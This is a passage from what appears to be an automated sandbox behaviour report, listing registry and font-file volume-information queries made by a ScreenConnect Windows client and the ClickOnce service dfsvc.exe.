                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
